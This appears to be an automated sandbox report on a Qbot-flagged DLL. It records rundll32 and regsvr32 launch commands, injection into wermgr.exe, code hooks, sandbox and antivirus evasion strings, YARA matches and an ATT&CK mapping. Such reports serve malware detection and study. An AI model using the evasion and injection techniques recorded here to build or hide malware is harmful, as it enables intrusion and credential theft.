          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\audiodg.exe C:\Windows\system32\AUDIODG.EXE 0x2ac
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailableJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\IkoqhruopJump to behavior
          Source: classification engineClassification label: mal96.troj.evad.winDLL@21/1@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099E485 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,3_2_0099E485
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099BAF6 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,3_2_0099BAF6
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{8EEC79E5-2878-4F5F-A98E-FA689CEEF067}
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{446EBB9A-7BA4-4C43-A020-E163B2EC3F81}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_01
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{8EEC79E5-2878-4F5F-A98E-FA689CEEF067}
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: pebbles.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: pebbles.dat.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: regsvr32.exe, 00000003.00000002.269410643.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.269325200.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.269366163.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009AB066 push ebx; ret 3_2_009AB067
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009AADB4 push cs; iretd 3_2_009AAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009AAEB6 push cs; iretd 3_2_009AAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_009ACB95 push esi; iretd 3_2_009ACB9A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0446B066 push ebx; ret 4_2_0446B067
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0446ADB4 push cs; iretd 4_2_0446AE8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0446AEB6 push cs; iretd 4_2_0446AE8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0446CB95 push esi; iretd 4_2_0446CB9A
          Source: pebbles.dat.dllStatic PE information: section name: .reloc6s
          Source: pebbles.dat.dllStatic PE information: section name: .hata
          Source: pebbles.dat.dll.8.drStatic PE information: section name: .reloc6s
          Source: pebbles.dat.dll.8.drStatic PE information: section name: .hata
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099EF38 LoadLibraryA,GetProcAddress,3_2_0099EF38
          Source: initial sampleStatic PE information: section where entry point is pointing to: .data
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Source: initial sampleStatic PE information: section name: .data entropy: 7.0153365923230595
          Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\Desktop\pebbles.dat.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 3472 base: 1353C50 value: E9 42 26 62 FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4884 base: 1353C50 value: E9 42 26 AF FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 612 base: 1353C50 value: E9 42 26 F5 FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
          Source: wermgr.exe, 00000008.00000003.272109944.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.271989769.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.272071328.00000000037D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
          Source: wermgr.exe, 00000008.00000003.272109944.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.271989769.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.272071328.00000000037D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXEP
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
          Source: wermgr.exe, 00000008.00000003.272109944.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.271989769.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.272071328.00000000037D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROC_ANALYZER.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEV
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep count: 134 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772Thread sleep count: 111 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 1960Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5284Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5608Thread sleep count: 47 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-15168
          Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-14019
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wermgr.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-11550
          Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-11545
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099DDE7 GetSystemInfo,3_2_0099DDE7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099C123 FindFirstFileW,FindNextFileW,3_2_0099C123
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0445C123 FindFirstFileW,FindNextFileW,4_2_0445C123
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099EF38 LoadLibraryA,GetProcAddress,3_2_0099EF38

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\audiodg.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 9A0000Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 1353C50Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: E70000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 1353C50Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: 9A0000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: E70000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099A1F8 GetSystemTimeAsFileTime,3_2_0099A1F8
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099DFC2 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,3_2_0099DFC2
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts3
          Native API          		1
          DLL Side-Loading          		311
          Process Injection          		1
          Masquerading          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Screen Capture          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Virtualization/Sandbox Evasion          		LSASS Memory11
          Security Software Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)311
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
